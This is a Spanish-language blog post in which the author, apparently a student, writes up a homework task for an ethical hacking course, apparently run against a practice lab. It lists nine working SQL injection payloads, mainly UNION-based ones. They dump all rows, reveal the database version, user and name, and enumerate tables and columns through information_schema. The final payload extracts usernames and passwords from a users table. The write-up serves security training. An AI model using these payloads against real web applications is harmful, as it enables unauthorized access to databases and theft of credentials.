Curso de Hacking Ético Capitulo 2 Tarea 2

La tarea 2 consiste en realiza una serie de pasos indicados para conocer las vulnerabilidades que ofrecen algunos desarrollos web en los cuales a través de una simple consulta se puede llegar a obtener información de la BD, tablas, datos, usuarios y claves.

Ahora el desarrollo de los pasos :

Paso 1:Simple consulta al registro N°1
paso1

Paso 2:Reemplazar la consulta por «%’ or ‘0’=’0», esto reemplaza la consulta en la BD obteniendo todos los registros de la tabla cambiando la condición de la consulta.

paso2

Paso 3: reemplazar el valor por «%’ or 0=0 union select null, version() #», de esta manera se obtiene la versión de la BD.

paso3

Paso 4:reemplazar el valor por «%’ or 0=0 union select null, user() #» de esta manera se obtiene el usuario conectado a la BD.

paso4

Paso 5:reemplazar el valor por «%’ or 0=0 union select null, database() #» de esta manera se obtiene el nombre de la BD.

paso5

Paso 6:reemplazar el valor por «%’ and 1=0 union select null, table_name from information_schema.tables #» de esta manera se obtiene la información de las tablas que contiene la BD.

paso6

Paso 7:reemplazar el valor por «%’ and 1=0 union select null, table_name from information_schema.tables where table_name like ‘user%’#» se obtiene todas las tablas que contienen el texto user en su nombre.

paso7

Paso 8:reemplazar el valor por «%’ and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = ‘users’ #» se obtienen todas las columnas de la tabla users.

paso8

Paso 9:reemplazar el valor por «%’ and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #» se obtiene los registros de la tabla users

paso9

Acerca de ocastillo61

Informático, Padre de Familia, autodidacta y emprendedor...
Esta entrada fue publicada en Sin categoría. Guarda el enlace permanente.

Deja un comentario